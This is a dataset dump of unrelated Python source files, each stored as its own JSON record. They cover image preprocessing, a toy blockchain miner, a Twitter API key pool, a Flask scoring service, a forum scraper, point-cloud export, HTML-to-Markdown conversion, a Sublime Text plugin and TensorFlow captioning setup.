+{"seq_id":"418962268","text":"import cv2\nimport numpy as np\nimport os\n\ndef resize(img):\n    return cv2.resize(img, (128, 128))\n\ndef prep_data(frame_folder):\n    if not os.path.exists('batches'):\n        os.mkdir('batches')\n    datafolder = 'data/'+frame_folder+'/'\n    frames = os.listdir(datafolder)\n    frames.sort(key = lambda x: int(x[:-4]))\n\n    img_shape = (1,1,128,128)\n    feats_shape = (1,2,128,128)\n    feats = np.empty(feats_shape)\n    targets = np.empty(img_shape)\n\n    num_frames = len(frames)\n    batch_size = 256\n    batches = num_frames // batch_size\n    dist = 8 # distance between two frames to predict\n    print('Starting to load frames and save as batches of {} numpy arrays'.format(batch_size))\n    for batch in range(batches):\n        for n in range(batch_size - dist):\n            frame_start = datafolder + frames[batch*batch_size + n]\n            frame_end = datafolder + frames[batch*batch_size + n+dist]\n            img_start = resize(cv2.imread(frame_start, cv2.IMREAD_GRAYSCALE)).reshape(img_shape)\n            img_end = resize(cv2.imread(frame_end, cv2.IMREAD_GRAYSCALE)).reshape(img_shape)\n            duo = np.hstack((img_start,img_end))\n            feats = np.vstack((feats, duo))\n\n            frame_mid = datafolder + frames[batch*batch_size + n + int(dist/2)]\n            img_mid = resize(cv2.imread(frame_mid, cv2.IMREAD_GRAYSCALE)).reshape(img_shape)\n            targets = np.vstack((targets, img_mid))\n\n        feats = np.delete(feats, 0, 0)\n        targets = np.delete(targets, 0, 0)\n\n        np.save('batches/batch{}_feats'.format(batch), feats.astype(int))\n        np.save('batches/batch{}_targets'.format(batch), targets.astype(int))\n        print('Done saving batch {} of {}'.format(batch+1, batches))\n\nif __name__ == \"__main__\":\n    prep_data('test_video')\n","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"518550501","text":"print(\"Program to convert a decimal number to its binary equivalent\")\nnum = int(input(\"Enter a number: \"))\nwhile num > 0:\n    num = int(input(\"Enter a non-negative number: \"))\n    if num == 0:\n        bin = \"0\"\n    else:\n        bin = \"\"\n        working = num\n        while working != 0:\n            if working % 2 != 1:\n                bin = \"0\" + bin\n            else:\n                bin = \"1\" + bin\n            print(bin)\n            working = working // 2\n    print(bin)\n    num = num - 1\n","sub_path":"Codevita/binary_equ.py","file_name":"binary_equ.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"605216002","text":"#!/usr/bin/python3\n\nimport psycopg2\nimport cv2\nimport requests\nimport numpy as np\nimport time\nfrom datetime import datetime\nimport json\n\npause = 30\n\nmikkas = ['vr', 'pizza_sh_sp', 'floor_r_sh_hd', 'floor_d_sh_sp', 'bed_lh_yk', 'bed_sh_sp', 'wine_sh_sp', 'pc']\nmikkas = [[m, cv2.imread(m + '.png')] for m in mikkas]\n\ndef get_image(ipfs_hash):\n    print(' Getting', ipfs_hash)\n    res = requests.get('https://infura-ipfs.io/ipfs/' + ipfs_hash)\n    if res.status_code == 200:\n        print(' done')\n        return res.content\n    else:\n        time.sleep(1)\n        return get_image(ipfs_hash)\n\nwhile True:\n    start = datetime.now()\n\n    conn = psycopg2.connect(dbname='cardanocity', port=5432)\n    cur = conn.cursor()\n    cur.execute('select * from units where mikka is null')\n    units = cur.fetchall()\n    units = [unit[1] for unit in units]\n    found = len(units)\n    print('\\n Found:', found)\n\n    if found == 0:\n        print(' Pausing for', pause)\n        time.sleep(pause)\n    else:\n        n = 1\n        positions = []\n        for unit in units:\n            print('\\n', n, 'of', found, '- Getting image for', unit['name'])\n            img = get_image(unit['image'][7:])\n            img = cv2.imdecode(np.frombuffer(img, np.uint8), 1)\n            vals = []\n            for mikka in mikkas:\n                try:\n                    r = cv2.matchTemplate(mikka[1], img, cv2.TM_SQDIFF_NORMED)\n                    min_val,_,_,_ = cv2.minMaxLoc(r)\n                except:\n                    min_val = 1\n                vals.append([mikka[0], min_val])\n                if min_val < 0.08:\n                    break\n            vals = sorted(vals, key=lambda k: k[1])\n            positions.append([unit['name'], mikka[0]])\n            print(positions[-1:])\n            n += 1\n        for p in positions:\n            p[1] = {'position': p[1]}\n            print(p)\n            cur.execute('insert into units(name,mikka) values(\\'' + p[0] + '\\',\\'' + json.dumps(p[1]).replace(\"\\'\", \"\\'\\'\") + '\\') on conflict (name) do update set mikka=excluded.mikka')\n            conn.commit()\n\n    cur.close()\n    conn.close()\n    print(' Finished in', datetime.now() - start)\n","sub_path":"get_positions.py","file_name":"get_positions.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"138992913","text":"# Lists\nbirthdays = {'Terrance': 'Apr 14', 'Dad': 'Sep 5', 'Sister': 'May 27'}\n\n\ndef main():\n    while True:\n        print('Enter a name: (blank to quit)')\n        name = input()\n        if name == '':\n            break\n        if name in birthdays:\n            print(birthdays[name] + ' is the birthday of ' + name)\n        else:\n            print('I do not have birthday information for ' + name)\n            print('What is their birthday?')\n            b_day = input()\n            birthdays[name] = b_day # Sets given name as new key and assigns given date as value.\n            print('Birthday database updated')\n\n\nmain()\n","sub_path":"Examples/chapter_ 5_birthdays.py","file_name":"chapter_ 5_birthdays.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"111538753","text":"# coding:utf-8\nfrom block import Block\nfrom account import get_account\nfrom database import BlockChainDB\nfrom lib.common import unlock_sig, lock_sig\n\nMAX_COIN = 21000000\nREWARD = 20\n\ndef coinbase():\n    \"\"\"\n    Generate the first block.
\n cb = block_height, version, merkle_root, target(setting difficulity), hash\n \"\"\"\n cb = Block(0, \"00000001\", \"0000000000000000000000000000000000000000000000000000000000000000\", \"0001000000000000000000000000000000000000000000000000000000000000\",\"\")\n nouce = cb.pow()\n cb.make(nouce)\n # Save block and transactions to database.\n\n BlockChainDB().insert(cb.to_dict())\n return cb\n\ndef mine():\n \"\"\"\n Main miner method.\n \"\"\"\n # Found last block and unchecked transactions.\n last_block = BlockChainDB().last()\n\n if len(last_block) == 0:\n last_block = coinbase().to_dict()\n\n # Miner reward is the first transaction.\n cb = Block( last_block['block_height'] + 1, last_block['version'], last_block['merkle_root'], last_block['target'], last_block['hash'])\n nouce = cb.pow()\n cb.make(nouce)\n # Save block and transactions to database.\n BlockChainDB().insert(cb.to_dict())\n # Broadcast to other nodes\n Block.spread(cb.to_dict())\n return cb","sub_path":"miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"639079546","text":"from heapq import heappush, heappop, heapify\nimport tweepy\nimport json\n\nKEY_FILE = \"keys.json\"\n\n\nclass API:\n\n def __init__(self, key):\n auth = tweepy.OAuthHandler(key[\"app_key\"], key[\"app_sec\"])\n auth.set_access_token(key[\"user_key\"], key[\"user_sec\"])\n self.api = tweepy.API(auth, retry_count = 3, retry_delay = 10, timeout=10, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n self.name = key[\"name\"]\n\n\nclass TwitterAPIPool:\n\n def __init__(self, category, sub_category):\n self.app_creds = []\n self.category = category\n self.sub_category = sub_category\n with open(KEY_FILE, 'r') as key_file:\n keys = json.load(key_file)\n for i, key in enumerate(keys['keys']):\n app = API(key)\n self.add_app_key(i, app)\n\n def add_app_key(self, pos, app):\n rate_limit_status = app.api.rate_limit_status(\n )['resources'][self.category][self.sub_category]\n priority_remaining_requests = -1 * rate_limit_status['remaining']\n priority_reset_time = rate_limit_status['reset']\n #print(app.name, pos, priority_remaining_requests, priority_reset_time)\n heappush(self.app_creds, (priority_remaining_requests,\n priority_reset_time, pos, app))\n\n def get_api(self):\n heapify(self.app_creds)\n app_min_wait_ = heappop(self.app_creds)\n pos = app_min_wait_[2]\n app = app_min_wait_[3]\n self.add_app_key(pos, app)\n return app.api\n\n def __len__(self):\n return len(self.app_creds)\n\n def __iter__(self):\n return self\n\n def next(self):\n try:\n return self.get_api()\n except IndexError:\n raise StopIteration\n","sub_path":"exploratory_analysis/.ipynb_checkpoints/TwitterAPIManager-checkpoint.py","file_name":"TwitterAPIManager-checkpoint.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"254652005","text":"import sys\nsys.path.insert(0,'/ebay/hermes/PETitles')\nfrom datetime import datetime\nfrom flask import Flask, request, Response\nfrom flask_json import json_response\nfrom model.ProductTitlesScoreServiceResponse import ProductTitlesScoreServiceResponse\nfrom titlescorer.scripts.PETitleScorerApi import PETitleScorer\nfrom functions.ServiceRequestToPythonObject import convert as ServiceRequstToBO\nimport json\n\napp = Flask(__name__)\napp.config['JSON_ADD_STATUS'] = False\ntemplate = \"An exception of type {0} occured. 
Arguments:\\n{1!r}"\n\n\n@app.route('/get_time')\ndef get_time():\n    now = datetime.utcnow()\n    return json_response(time=now)\n\n@app.route('/hello', methods=['GET'])\ndef hello():\n    hello = "hello"\n    return hello\n\n@app.route('/getTitleScore', methods=['POST'])\ndef handleTitleScoreRequest():\n    try:\n        peTitlesScorerResponse = []\n        jsonRequest = json.loads(request.data)\n        productTitlesScoreServiceRequest = ServiceRequstToBO(jsonRequest)\n        for response in peTitleScorer.calculate_score(productTitlesScoreServiceRequest.productTitlesScoreRequest):\n            peTitlesScorerResponse.append(response)\n        productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(productTitlesScoreServiceRequest.invocationId, peTitlesScorerResponse, 200), 200)\n    except ValueError as ex:\n        message = template.format(type(ex).__name__, ex.args)\n        productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(None, None, 400, message), 400)\n    except KeyError as ex:\n        message = template.format(type(ex).__name__, ex.args)\n        productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(jsonRequest['invocationId'], None, 404, message), 404)\n    except Exception as ex:\n        message = template.format(type(ex).__name__, ex.args)\n        productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(None, None, 500, "Internal System Error"), 500)\n\n    return productTitlesScoreServiceResponse\n\n\ndef createServiceResponse(productTitlesScoreServiceResponse, status_code):\n    json_response = json.dumps(productTitlesScoreServiceResponse, default=lambda o: o.__dict__, sort_keys=True, indent=4)\n    response = Response(json_response, content_type='application/json; charset=utf-8')\n    response.headers.add('content-length', len(json_response))\n    response.status_code = status_code\n    return response\n\n\nif __name__ == "__main__":\n    adj_fname = "/ebay/hermes/PETitles/data/adj.txt"\n    model_fname = "/ebay/hermes/PETitles/data/model"\n    true_case = "/ebay/hermes/PETitles/data/true_case.txt"\n    peTitleScorer = PETitleScorer(model_fname, adj_fname, true_case)\n    app.run(host='0.0.0.0', port=8000, threaded=True)\n","sub_path":"TitleScoreService.py","file_name":"TitleScoreService.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"467698207","text":"'''\n@Author : sean cheng\n@Email : aya234@163.com\n@CreateTime : 2018/11/3\n@Program : Main entry point for the Sudoku game\n'''\nimport pygame\nfrom pygame import *\nfrom sudoku.SetVar import SetVar\nfrom sudoku.game_draw import draw_gameArray, draw_background, draw_seletced, setting\n\n\ndef main():\n    global gameArray, selectedArray\n    setting = SetVar()\n\n    pygame.init()\n    screen = pygame.display.set_mode((setting.SCREEN_WIDTH, setting.SCREEN_HEIGHT))\n    pygame.display.set_caption('Sudoku - a PyGame implementation, version 0.12')\n\n    gameArray = setting.game_data_load()\n    selectedArray = setting.selectedArray\n    # print(gameArray)\n\n    while True:\n        # handle quit events to close the game\n        setting.terminal_window()\n        draw_background(screen)\n        draw_gameArray(screen, gameArray)\n        draw_seletced(screen)\n\n        pygame.time.Clock().tick(30)\n        pygame.display.update()\n\n\nif __name__ == '__main__':\n    main()","sub_path":"sudoku/Sudoku.py","file_name":"Sudoku.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"139000100","text":"import os\n\nimport time\n\nfrom std.std import 
merge\n\n\ndef replace_strings(bundle, new_bundle):\n # Begin function work\n count_total = 0\n total_replace = 0\n count_error = 0\n\n for path, dirs, files in os.walk(\"/Users/andrew/PycharmProjects/python-build-script/test/android/assets\", True):\n for cur_name in files:\n print(files)\n count_total += 1\n file_path = merge(path, cur_name)\n try:\n text = open(file_path).read()\n if bundle in text:\n open(file_path, 'w').write(text.replace(bundle, new_bundle))\n total_replace += 1\n\n except ValueError:\n count_error += 1","sub_path":"test/android/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"264354826","text":"from flare.gp import GaussianProcess\nfrom flare.struc import Structure\nfrom flare.env import AtomicEnvironment\nimport numpy as np\nimport time\nimport datetime\n\nfrom flare import md\nfrom flare.output import Output\nimport flare.predict as predict\n\nclass MD:\n \"\"\"Generates NVE dynamics from a GP model.\"\"\"\n\n def __init__(self, dt: float, number_of_steps: int, gp: GaussianProcess,\n pos_init: np.ndarray, species, cell, masses,\n prev_pos_init: np.ndarray=None, par: bool=False, skip: int=0,\n output_name='otf_run.out'):\n\n self.dt = dt\n self.Nsteps = number_of_steps\n self.gp = gp\n\n self.structure = Structure(cell=cell, species=species,\n positions=pos_init,\n mass_dict=masses,\n prev_positions=prev_pos_init)\n\n self.noa = self.structure.positions.shape[0]\n self.atom_list = list(range(self.noa))\n self.curr_step = 0\n\n # choose prediction function\n if par is True:\n self.pred_func = predict.predict_on_structure_par_en\n else:\n self.pred_func = predict.predict_on_structure_en\n\n # initialize local energies\n self.local_energies = np.zeros(self.noa)\n\n self.pes = []\n self.kes = []\n\n self.output = Output(output_name)\n\n def run(self):\n self.output.write_header(self.gp.cutoffs, self.gp.kernel_name, self.gp.hyps,\n self.gp.algo, self.dt, self.Nsteps, self.structure)\n self.start_time = time.time()\n\n while self.curr_step < self.Nsteps:\n # verlet algorithm follows Frenkel p. 
70\n self.gp.check_L_alpha()\n self.pred_func()\n new_pos = md.update_positions(self.dt, self.noa, self.structure)\n self.update_temperature(new_pos)\n self.record_state()\n self.update_positions(new_pos)\n self.curr_step += 1\n\n self.output.conclude_run()\n\n def update_positions(self, new_pos):\n self.structure.prev_positions = self.structure.positions\n self.structure.positions = new_pos\n self.structure.wrap_positions()\n\n def update_temperature(self, new_pos):\n KE, temperature = \\\n md.calculate_temperature(new_pos, self.structure, self.dt,\n self.noa)\n self.KE = KE\n self.temperature = temperature\n\n def record_state(self):\n self.pes.append(np.sum(self.local_energies))\n self.kes.append(self.KE)\n self.output.write_md_config(self.dt, self.curr_step, self.structure,\n self.temperature, self.KE, self.local_energies,\n self.start_time)\n self.output.write_xyz_config(self.curr_step, self.structure,\n self.dft_step)\n","sub_path":"flare/md_run.py","file_name":"md_run.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"334926998","text":"import datetime\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\ncsvoutput=open(\"csvEcnJapanese.csv\", \"w+\", encoding=\"UTF-8\")\noutput=open(\"ecnJapanese.txt\", \"w+\", encoding=\"UTF-8\")\n\ndef getEcnstats(threadId):\n html=urlopen(\"https://community.emc.com/thread/\"+str(threadId))\n bsObj=BeautifulSoup(html)\n title=bsObj.title.get_text()\n title=title.strip(\"EMC Community Network - DECN\")\n title=title.strip(\": \")\n questioner=bsObj.find(\"a\", {\"class\":\"jiveTT-hover-user jive-username-link\"})\n questioner=questioner.get_text()\n qpostedtime=bsObj.find(\"span\", {\"class\":\"j-post-author\"})\n qpostedtime=qpostedtime.get_text()\n textlist=qpostedtime.split(\" \")\n posttime=datetime.datetime.strptime(textlist[4], '%H:%M')\n \n summertime=0\n hour = posttime.hour+summertime\n minute = posttime.minute\n\n print(title+\"\\n\")\n output.write(title+\"\\n\")\n csvoutput.write(str(threadId)+\",\"+ title+\",\"+questioner+\",\"+str(hour)+\":\"+str(minute)+\"\\n\")\n\ndef getThreadtext(threadId):\n html=urlopen(\"https://community.emc.com/thread/\"+str(threadId))\n bsObj=BeautifulSoup(html)\n bodylist=bsObj.findAll(\"div\", {\"class\":\"jive-rendered-content\"})\n for body in bodylist: \n print(body.get_text()+\"\\n\")\n output.write(body.get_text()+\"\\n\")\n\n\nstartId=input(\"Enter the first thread# which in the Japanese forum site: \")\nendId=input(\"Enter the last thread# which in the Japaneese forum site: \")\nendId=int(endId)+1\n\nfor i in range(int(startId), int(endId)):\n try:\n htmltemp=urlopen(\"https://community.emc.com/thread/\"+str(i))\n except:\n print(\"Thread#\"+str(i)+\" has been deleted or is an invalid or private thread.\")\n else:\n bsObjTemp=BeautifulSoup(htmltemp)\n templist=bsObjTemp.findAll(\"script\", {\"type\":\"text/javascript\"})\n templist=str(templist)\n if \"communityID = '2814';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3093';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3094';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3095';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3096';\" in templist:\n getEcnstats(i)\n 
getThreadtext(i)\n\ncsvoutput.close()\noutput.close()\n\n\n","sub_path":"test_ecnJapanesetext4stats.py","file_name":"test_ecnJapanesetext4stats.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"110717249","text":"from sys import stdin\nimport time\n\n\ndef pascal(n):\n    if n == 1:\n        return [1]\n    else:\n        line = [1]\n        linea_ant = pascal(n-1)\n        for i in range(len(linea_ant)-1):\n            line.append(linea_ant[i] + linea_ant[i+1])\n        line += [1]\n        print(*linea_ant)\n        return line\n\n\ndef main():\n    start = time.time()\n    n = int(stdin.readline().strip())\n    print(*pascal(n))\n    end = time.time()\n    elapsed = end - start\n    # time.time() already returns seconds; the old code divided by 1000 (and spelled 'start' as 'stard')\n    print(elapsed)\nmain()\n","sub_path":"laboratorios/lab3/D -Pascal triangle.py","file_name":"D -Pascal triangle.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510328049","text":""""\nParameters for GridSearchCV\n\nModels:\n- Support Vector Regressor (SVR)\n- Gradient Boosting Tree Regressor (GBRT)\n- Random Forest Regressor (RFR)\n"""\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# #Support Vector Regressor (SVR)\nsvr_param_grid = {'kernel': ['linear', 'poly', 'rbf'], \n\t\t\t\t 'degree': [2, 3], \n\t\t\t\t 'C': [5, 4, 3, 2, 1],\n\t\t\t\t 'gamma': [0.01, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 1], \n\t\t\t\t 'coef0': [0.0, 0.5, 0.7, 1, 5, 10] }\n\n# #Gradient Boosting Tree Regressor (GBRT)\ngbrt_param_grid = {'n_estimators': list(range(10, 500, 10)),\n\t\t\t\t 'loss': ['ls', 'huber'],\n\t\t\t\t 'learning_rate': [0.01, 0.05, 0.1, 0.25, 0.5], \n\t\t\t\t 'max_features': ['sqrt'],\n\t\t\t\t 'max_depth':[5, 4, 3, 2, 1], \n\t\t\t\t 'min_samples_split':[3, 2]} \n\n# #Random Forest Regressor (RFR)\nrfr_param_grid = {'n_estimators': list(range(10, 500, 10)), \n\t\t\t\t 'criterion': ['mse'], \n\t\t\t\t 'max_depth': [None], \n\t\t\t\t 'min_samples_split': [2, 4], \n\t\t\t\t 'min_samples_leaf': [2, 5, 10], \n\t\t\t\t 'max_features': ['auto'], \n\t\t\t\t 'bootstrap': [True], \n\t\t\t\t 'oob_score': [False]}\n","sub_path":"Final Project/JJ_Machine_Learning/code/model_parameters.py","file_name":"model_parameters.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"363158682","text":"import numpy as np\nfrom plyfile import (PlyData, PlyElement, make2d, PlyParseError, PlyProperty)\n\ndef camera_depth_to_plane_depth(depth, f):\n\n    h_ = depth.shape[0]\n    w_ = depth.shape[1]\n\n    # plain float() replaces the deprecated np.float alias\n    i_c_ = float(h_) / 2 - 1\n    j_c_ = float(w_) / 2 - 1\n\n    cols_, rows_ = np.meshgrid(np.linspace(0, w_ - 1, num = w_), np.linspace(0, h_ - 1, num = h_))\n    dist_from_center_ = ((rows_ - i_c_)**2 + (cols_ - j_c_)**2)**(0.5)\n    plane_depth_ = depth / ((1 + dist_from_center_ / f)**2)**(0.5)\n\n    return plane_depth_\n\ndef rgbd_to_rgb_cloud(depth, color, cx, cy, fx, fy):\n\n    points_ = []\n    colors_ = []\n\n    # iterate over every pixel; the previous range(0, n-1) bounds skipped the last row and column\n    for i in range(depth.shape[1]):\n        for j in range(depth.shape[0]):\n\n            z_ = depth[j][i] / 1000.0\n            x_ = (i - cx) * (z_ / fx)\n            y_ = (j - cy) * (z_ / fy)\n\n            r_ = color[j][i][0]\n            g_ = color[j][i][1]\n            b_ = color[j][i][2]\n\n            points_.append([x_, y_, z_])\n            colors_.append([r_, g_, b_])\n\n    return np.array(points_), np.array(colors_)\n\ndef save_ply_cloud(points, colors, filename):\n\n    vertex = np.zeros(points.shape[0], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')])\n\n    for i in 
range(points.shape[0]):\n vertex[i] = (points[i][0], points[i][1], points[i][2], colors[i][0], colors[i][1], colors[i][2])\n \n ply_out = PlyData([PlyElement.describe(vertex, 'vertex', comments=['vertices'])])\n ply_out.write(filename)\n\ndef generate_cloud(depth, color, camera, outFilename):\n plane_depth_ = camera_depth_to_plane_depth(depth, camera.fx)\n points_, colors_ = rgbd_to_rgb_cloud(plane_depth_, color, camera.cx, camera.cy, camera.fx, camera.fy)\n save_ply_cloud(points_, colors_, outFilename)\n","sub_path":"generator/gnt_cloud.py","file_name":"gnt_cloud.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"136021081","text":"#!/usr/bin/python\nimport html2text\nfrom bs4 import BeautifulSoup\nimport posixpath\nimport os\nfrom os import remove\nfrom os import listdir\nfrom os.path import isfile, join, isdir, relpath\nimport shutil\nimport queue\n\n\n# TODO:\n# - [x]Read in whole file\n# - [x]Convert whole file to markdown\n# - [x]Write to a new file\n# - [x]read in line by line until ##\n# - [x]copy the rest of file into new samename markdown file\n# - [x] fix document links\n# - [x] create a directory with the filename\n# - [x] store images used in the directory\n# - [] keep relative path for links\n\n# helper function that checks if a link is valid\nimages = {}\nrootpath = \"~/\"\nq = queue.Queue()\nmypath = os.getcwd()\nstring = mypath.split('\\\\')\nmypath = \"/\".join(string)\nfiledict = {\n \"AP-OVERVIEW.htm\": \"AP-OVERVIEW\",\n \"AP-OVERVIEW.htm\": \"AP-OVERVIEW\",\n \"AR-OVERVIEW.htm\": \"AR-OVERVIEW\",\n \"DOC-OVERVIEW.htm\": \"DOC-OVERVIEW\",\n \"ENG-OVERVIEW.htm\": \"ENG-OVERVIEW\",\n \"EXEC-OVERVIEW.htm\": \"EXEC-OVERVIEW\",\n \"FS-OVERVIEW.htm\": \"FS-OVERVIEW\",\n \"GL-OVERVIEW.htm\": \"GL-OVERVIEW\",\n \"INV-OVERVIEW.htm\": \"INV-OVERVIEW\",\n \"MFG-OVERVIEW.htm\": \"MFG-OVERVIEW\",\n \"MRK-OVERVIEW.htm\": \"MRK-OVERVIEW\",\n \"PRO-OVERVIEW.htm\": \"PRO-OVERVIEW\",\n \"PUR-OVERVIEW.htm\": \"PUR-OVERVIEW\",\n \"ACE-OVERVIEW.htm\": \"ACE-OVERVIEW\"\n}\nlinkset = {}\nfor key in filedict:\n filedict[key] = mypath + '/' + filedict[key]\n\nvisited = set()\n\n\ndef valid_link(link):\n return isfile(link)\n\n# helper funciton that decomposes prev and next links\n\n\ndef sanitize_links(soup):\n for item in soup.find_all('a'):\n title = item.string\n if title == \"Previous\" or title == \"Next\":\n item.decompose()\n\n# Helper function that gets specified link from soup and decomposes if link is not valid\n\n\ndef move_images(images, path):\n if(len(images) > 0):\n for image in images:\n shutil.copy(image, path)\n\n\ndef get_images(soup):\n images = []\n for image in soup.find_all('img'):\n imagepath = image.get('src')\n if valid_link(imagepath):\n imagename = imagepath[7:len(imagepath)]\n image['src'] = \"./\" + imagename\n images.append(imagepath)\n return images\n\n\ndef get_relative(root, storedpath):\n string = storedpath.split('site/')[1]\n return root + string\n\n# This function returns a string that points to the site/ folder\n\n\ndef get_root_string(height):\n str = \"\"\n for i in range(0, height):\n str += '../'\n return str\n\n\ndef get_height(path):\n tokens = path.split('/')\n tokens.reverse()\n height = 0\n for token in tokens:\n if token != 'site':\n height += 1\n else:\n break\n return height\n\n\ndef get_links(parentfolder, soup):\n links = []\n for atag in soup.find_all('a'):\n href = atag['href']\n childfolder = href.split(\".\")[0]\n if href in visited:\n 
storedpath = filedict[href]\n height = get_height(filedict[parentfolder])\n root = get_root_string(height)\n relativepath = get_relative(root, storedpath)\n atag['href'] = relativepath\n # relative = relpath(storedpath, join(\n # filedict[parentfolder], childfolder))\n #atag['href'] = relative\n elif valid_link(href):\n currpath = filedict[parentfolder] + '/' + childfolder\n filedict[href] = currpath\n atag['href'] = get_prepend_diff(\n currpath, parentfolder) + \"/README.md\"\n links.append(href)\n else:\n atag.decompose\n return links\n\n\ndef get_prepend_diff(currpath, parentfolder):\n tokens = currpath.split('/')\n parent = parentfolder.split('.')[0]\n toconcat = False\n path = []\n for str in tokens:\n if toconcat:\n path.append(str)\n if str == parent:\n toconcat = True\n\n return '/'.join(path)\n\n\n# Helper function to create directory\n\ndef create_dir(path):\n if not isdir(path):\n os.mkdir(path)\n\n# Helper funciton to create README file\n\n\ndef create_base_readme(path):\n filename = join(path, \"README.md\")\n if not isfile(filename):\n f = open(filename, \"x\")\n f.close()\n return 1\n return 0\n\n# Format the version badge\n\n\ndef version(path):\n f = open(join(path, \"README.md\"), 'r+')\n string = f.readline()\n content = \"\"\n while string != '':\n tempstring = string[0: 7]\n if 'Version' == tempstring:\n break\n elif 'Copyright' in string:\n break\n content += string\n string = f.readline()\n while 'Version' not in string and string != '':\n string = f.readline()\n string = string.strip()\n tokenizedstring = string.split(' ')\n string = tokenizedstring[0] + ' ' + tokenizedstring[1]\n content += ''\n return content\n\n\ndef sanitize_html(path):\n f = open(path)\n line = f.readline()\n content = \"\"\n while not \" FalSe\n\t\t\t\t# For original case\n\t\t\t\tif editor_word == word_item[i]:\n\t\t\t\t\tself.view.replace(view, region, word_item[j])\n\t\t\t\t\treturn\n\t\t\t\t# true <> false\n\t\t\t\t# For case when all letters are lowercase\n\t\t\t\tif editor_word == word_item[i].lower():\n\t\t\t\t\tself.view.replace(view, region, word_item[j].lower())\n\t\t\t\t\treturn\n\t\t\t\t# True <> False\n\t\t\t\t# For case when first letter is uppercase\n\t\t\t\tif editor_word == word_item[i].capitalize():\n\t\t\t\t\tself.view.replace(view, region, word_item[j].capitalize())\n\t\t\t\t\treturn\n\t\t\t\t# TRUE <> FALSE\n\t\t\t\t# For case when all letters are uppercase\n\t\t\t\tif editor_word == word_item[i].upper():\n\t\t\t\t\tself.view.replace(view, region, word_item[j].upper())\n\t\t\t\t\treturn\n\n\t\t# Word not found? 
Show message\n\t\tsublime.status_message(\n\t\t\t"{0}: Can't find toggles for '{1}'".format(PLUGIN_NAME, editor_word)\n\t\t)\n\n\tdef run(self, view):\n\n\t\t# Would be nice to only run config when loading the editor,\n\t\t# not on each time the main function is called, but...\n\t\t# can't figure out how to do that without breaking the loading of plugin\n\t\tuser_dict = sublime.Settings.get(sublime.load_settings(SETTINGS_FILE), 'toggle_word_dict', {})\n\n\t\twords_dict = DEFAULT_WORDS\n\n\t\tfor item in user_dict:\n\t\t\twords_dict.append(item)\n\n\t\tfor region in self.view.sel():\n\t\t\tword_region = self.view.word(region)\n\t\t\tself.toggle_word(view, word_region, words_dict)\n","sub_path":"ToggleWord.py","file_name":"ToggleWord.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"623027886","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport tensorflow as tf\nfrom tensorflow import gfile\nfrom tensorflow import logging\nimport pprint\nimport pickle\nimport numpy as np\nimport math\nimport random\n\n# log at INFO level\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\ninput_description_file = "./flickr 30k/results_20130124.token"\ninput_img_feature_dir = './flickr 30k/download_tensorflow_inception_features'\ninput_vocab_file = './flickr 30k/vocab.txt'\noutput_dir = './flickr 30k/local_run'\n\nif not gfile.Exists(output_dir):\n    gfile.MakeDirs(output_dir)\n\n\ndef get_default_params():\n    return tf.contrib.training.HParams(\n        num_vocab_word_threshold=3,\n        num_embedding_nodes=32,\n        num_timesteps=10,\n        num_lstm_nodes=[64, 64],\n        num_lstm_layers=2,\n        num_fc_nodes=32,\n        batch_size=100,\n        cell_type='lstm',\n        clip_lstm_grads=1.0,\n        learning_rate=0.001,\n        keep_prob=0.8,\n        log_frequent=500,\n        save_frequent=5000,\n    )\n\ntraining_steps = 